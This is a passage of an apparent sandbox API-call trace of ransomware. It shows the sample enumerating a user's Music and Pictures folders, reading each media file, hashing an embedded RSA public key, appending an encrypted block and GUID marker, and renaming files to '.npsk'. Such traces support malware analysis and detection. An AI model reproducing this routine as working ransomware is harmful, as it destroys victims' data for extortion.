out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x4f14, lpOverlapped=0x0) returned 1 [0217.205] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.205] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.205] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.205] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1c60) returned 1 [0217.206] CryptCreateHash (in: hProv=0x7b1c60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.206] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.206] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.206] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.207] GetLastError () returned 0x0 [0217.207] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.207] CryptReleaseContext (hProv=0x7b1c60, dwFlags=0x0) returned 1 [0217.207] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.207] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.207] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.207] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0217.208] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x4f14, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.208] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.208] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.208] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.208] CloseHandle (hObject=0x61c) returned 1 [0217.211] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\cC5yZDQeoG7WV 4j4fq.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\cc5yzdqeog7wv 4j4fq.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\cC5yZDQeoG7WV 4j4fq.m4a.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\cc5yzdqeog7wv 4j4fq.m4a.npsk")) returned 1 [0217.214] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc443890, ftCreationTime.dwHighDateTime=0x1d5dc88, ftLastAccessTime.dwLowDateTime=0x119c85b0, ftLastAccessTime.dwHighDateTime=0x1d5db1e, ftLastWriteTime.dwLowDateTime=0x119c85b0, ftLastWriteTime.dwHighDateTime=0x1d5db1e, nFileSizeHigh=0x0, nFileSizeLow=0x5278, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="K-Og.mp3", cAlternateFileName="")) returned 1 [0217.214] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\K-Og.mp3") returned=".mp3" [0217.214] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\K-Og.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\k-og.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.216] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=21112) returned 1 [0217.216] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.218] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x5252, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.218] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.220] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x5278, lpOverlapped=0x0) returned 1 [0217.220] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.221] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.221] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.221] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1c60) returned 1 [0217.222] CryptCreateHash (in: hProv=0x7b1c60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.222] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.222] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.222] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.222] GetLastError () returned 0x0 [0217.222] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.222] CryptReleaseContext (hProv=0x7b1c60, dwFlags=0x0) returned 1 [0217.222] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.222] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.222] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.222] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0217.223] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x5278, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.223] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.223] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.223] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.223] CloseHandle (hObject=0x61c) returned 1 [0217.225] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\K-Og.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\k-og.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\K-Og.mp3.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\k-og.mp3.npsk")) returned 1 [0217.227] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd6b9bea0, ftCreationTime.dwHighDateTime=0x1d5de1e, ftLastAccessTime.dwLowDateTime=0xd9d16370, ftLastAccessTime.dwHighDateTime=0x1d5de61, ftLastWriteTime.dwLowDateTime=0xd9d16370, ftLastWriteTime.dwHighDateTime=0x1d5de61, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tP3BeQ_6ct", cAlternateFileName="TP3BEQ~1")) returned 1 [0217.227] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f22e0a0, ftCreationTime.dwHighDateTime=0x1d5e18e, ftLastAccessTime.dwLowDateTime=0x92453b80, ftLastAccessTime.dwHighDateTime=0x1d5dbd7, ftLastWriteTime.dwLowDateTime=0x92453b80, ftLastWriteTime.dwHighDateTime=0x1d5dbd7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xaU6e6HDu", cAlternateFileName="XAU6E6~1")) returned 1 [0217.227] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f22e0a0, ftCreationTime.dwHighDateTime=0x1d5e18e, ftLastAccessTime.dwLowDateTime=0x92453b80, ftLastAccessTime.dwHighDateTime=0x1d5dbd7, ftLastWriteTime.dwLowDateTime=0x92453b80, ftLastWriteTime.dwHighDateTime=0x1d5dbd7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xaU6e6HDu", cAlternateFileName="XAU6E6~1")) returned 0 [0217.227] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0217.227] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0217.227] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0217.227] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\J6W_22\\") returned="J6W_22\\" [0217.227] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\") returned="S-r24cctxl\\" [0217.227] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0217.227] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0217.227] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0217.227] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0217.228] PathFindFileNameW (pszPath="") returned="" [0217.228] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\J6W_22\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xda380640, ftCreationTime.dwHighDateTime=0x1d5e20b, ftLastAccessTime.dwLowDateTime=0xb2181a40, ftLastAccessTime.dwHighDateTime=0x1d5e758, ftLastWriteTime.dwLowDateTime=0xb2181a40, ftLastWriteTime.dwHighDateTime=0x1d5e758, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0217.230] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xda380640, ftCreationTime.dwHighDateTime=0x1d5e20b, ftLastAccessTime.dwLowDateTime=0xb2181a40, ftLastAccessTime.dwHighDateTime=0x1d5e758, ftLastWriteTime.dwLowDateTime=0xb2181a40, ftLastWriteTime.dwHighDateTime=0x1d5e758, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0217.230] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f8024e0, ftCreationTime.dwHighDateTime=0x1d5e4ad, ftLastAccessTime.dwLowDateTime=0x6c6ef60, ftLastAccessTime.dwHighDateTime=0x1d5e7e7, ftLastWriteTime.dwLowDateTime=0x6c6ef60, ftLastWriteTime.dwHighDateTime=0x1d5e7e7, nFileSizeHigh=0x0, nFileSizeLow=0x533b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8W3iDPW8ahHsn32DJ.bmp", cAlternateFileName="8W3IDP~1.BMP")) returned 1 [0217.230] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\J6W_22\\8W3iDPW8ahHsn32DJ.bmp") returned=".bmp" [0217.230] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\J6W_22\\8W3iDPW8ahHsn32DJ.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\j6w_22\\8w3idpw8ahhsn32dj.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.231] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=21307) returned 1 [0217.231] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.232] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x5315, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.233] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.234] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x533b, lpOverlapped=0x0) returned 1 [0217.235] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.235] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.235] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.235] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0217.236] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.236] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.236] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.236] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.236] GetLastError () returned 0x0 [0217.236] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.236] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0217.236] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.236] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.236] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.236] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0217.237] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x533b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.237] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.237] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.237] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.237] CloseHandle (hObject=0x61c) returned 1 [0217.241] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\J6W_22\\8W3iDPW8ahHsn32DJ.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\j6w_22\\8w3idpw8ahhsn32dj.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\J6W_22\\8W3iDPW8ahHsn32DJ.bmp.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\j6w_22\\8w3idpw8ahhsn32dj.bmp.npsk")) returned 1 [0217.242] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16ae2850, ftCreationTime.dwHighDateTime=0x1d5d949, ftLastAccessTime.dwLowDateTime=0xd1cd6fc0, ftLastAccessTime.dwHighDateTime=0x1d5ddad, ftLastWriteTime.dwLowDateTime=0xd1cd6fc0, ftLastWriteTime.dwHighDateTime=0x1d5ddad, nFileSizeHigh=0x0, nFileSizeLow=0x864e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bh4Zlqq4w.jpg", cAlternateFileName="BH4ZLQ~1.JPG")) returned 1 [0217.242] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\J6W_22\\bh4Zlqq4w.jpg") returned=".jpg" [0217.242] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\J6W_22\\bh4Zlqq4w.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\j6w_22\\bh4zlqq4w.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.244] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=34382) returned 1 [0217.244] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.245] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x8628, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.245] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.247] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, 